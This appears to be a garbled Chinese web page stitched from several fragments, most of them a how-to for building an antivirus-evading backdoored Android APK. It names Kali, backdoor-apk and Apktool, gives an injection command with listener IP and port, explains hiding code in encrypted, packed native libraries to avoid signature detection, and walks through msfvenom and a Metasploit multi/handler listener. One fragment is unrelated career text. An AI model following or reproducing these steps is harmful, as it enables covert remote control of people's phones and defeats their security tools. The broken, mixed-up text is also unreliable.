首先,工具准备是实现后门控制apk手动免杀的关键,包括Kali 201702backdoorapkApktool以及CPUZ确保使用的Apktool版本最新,以避免因版本过旧导致的步骤失败在完成工具准备后,按照以下步骤进行环境处理与后门注入1 下载并替换Apktool至Kali系统中,确保其版本是最新的2 使用git工具克隆backdoorapk。
使用命令注入payload python mainpy lhost youip lport youport n vxapk 填写公网IP与端口,本地映射至12700011145端口 生成注入成功的apk与监听脚本 远控Apk位于root520apkhookWorkDirAllFinishapk 监听脚本位于root520apkhookWorkDirhandlerrc 3下载并安装apk 4启动。
网络安全工程师需要学服务漏洞扫描程序漏洞分析检测权限管理入侵和攻击分析追踪网站渗透病毒木马防范计算机语言等内容,还需要懂得网络安全产品的配置和使用网络安全工程师的工作职责一主持项目网络安全产品的需求分析项目可行性分析技术评测方案规划和搭建,提供相关技术支持二设计。
可以的,实现方法可以把全部java源码以字符串的形式编译进so,程序运行的时候so再把java代码注入到虚拟机百分百不会被杀毒软件找到特征码,不行再把java源码加壳,再加密保存在so,so再加壳。
msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应apk手动免杀你要监听的端口 然后生成木马的路径 这样我们就在root路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈现在我们在来启动MSF工具 输入命令msfconsole 然后输入1 use exploitmultihandler 加载。
发表评论